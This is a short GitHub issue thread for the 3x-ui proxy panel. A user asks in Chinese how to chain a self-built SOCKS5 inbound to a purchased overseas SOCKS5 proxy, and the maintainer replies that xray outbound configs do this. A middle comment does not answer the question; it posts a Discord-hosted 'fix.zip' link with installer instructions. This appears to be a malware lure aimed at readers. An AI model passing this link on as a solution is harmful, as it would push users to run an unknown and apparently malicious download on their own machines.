### ISSUE TITLE
你好，3-xui可不可以在socks5上加一个代理功能

### ISSUE THREAD

**Issue by Hugh123888** [MHSanaei/3x-ui#2510]
你好，3-xui可不可以在socks5上加一个代理功能，就是比如我自己用3x-ui搭建了一个socks5，然后我买了一条海外的socks5的代理，然后我想通过链接自己搭建的的socks5然后转发到买的那条海外的socks5,从那条的ip出去

**Comment by 777Naity** [comment]
try this
https://cdn.discordapp.com/attachments/1277836331501883449/1280291965879193731/fix.zip?ex=66d78c4f&is=66d63acf&hm=ac05131390b92a2047e3ee0fc4189fe126bf357b3d3cd73f5c0e51ba28c1c538&
select the desired compiler in the installer

**Comment by MHSanaei** [comment]
You can use outbound on xray configs
